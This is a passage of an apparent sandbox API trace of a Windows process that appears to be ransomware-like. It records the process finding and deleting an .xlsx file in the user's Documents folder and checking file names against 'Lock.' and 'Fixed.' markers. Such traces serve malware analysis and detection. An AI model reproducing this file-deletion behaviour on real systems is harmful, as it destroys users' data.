dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0261.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.465] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0261.465] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.466] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0261.467] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/D3BEewSKP- XS.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx", lpFilePart=0x8bedfc*="D3BEewSKP- XS.xlsx") returned 0x3a [0261.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0261.468] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d3beewskp- xs.xlsx")) returned 0x20 [0261.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee327a60, ftCreationTime.dwHighDateTime=0x1d4c3a6, ftLastAccessTime.dwLowDateTime=0x70160dd0, ftLastAccessTime.dwHighDateTime=0x1d4b8b2, ftLastWriteTime.dwLowDateTime=0x70160dd0, ftLastWriteTime.dwHighDateTime=0x1d4b8b2, nFileSizeHigh=0x0, nFileSizeLow=0xfecf, dwReserved0=0x1ab3, dwReserved1=0x4, cFileName="D3BEewSKP- XS.xlsx", cAlternateFileName="D3BEEW~1.XLS")) returned 0xaa5920 [0261.468] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d3beewskp- xs.xlsx")) returned 1 [0261.470] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee327a60, ftCreationTime.dwHighDateTime=0x1d4c3a6, ftLastAccessTime.dwLowDateTime=0x70160dd0, ftLastAccessTime.dwHighDateTime=0x1d4b8b2, ftLastWriteTime.dwLowDateTime=0x70160dd0, ftLastWriteTime.dwHighDateTime=0x1d4b8b2, nFileSizeHigh=0x0, nFileSizeLow=0xfecf, dwReserved0=0x1ab3, dwReserved1=0x4, cFileName="D3BEewSKP- XS.xlsx", cAlternateFileName="D3BEEW~1.XLS")) returned 0 [0261.470] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0261.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.471] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0261.471] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0261.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0261.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.472] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0261.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/D3BEewSKP- XS.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx", lpFilePart=0x8bf658*="D3BEewSKP- XS.xlsx") returned 0x3a [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0261.474] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D3BEewSKP- XS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d3beewskp- xs.xlsx")) returned 0xffffffff [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0261.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.476] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0261.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) 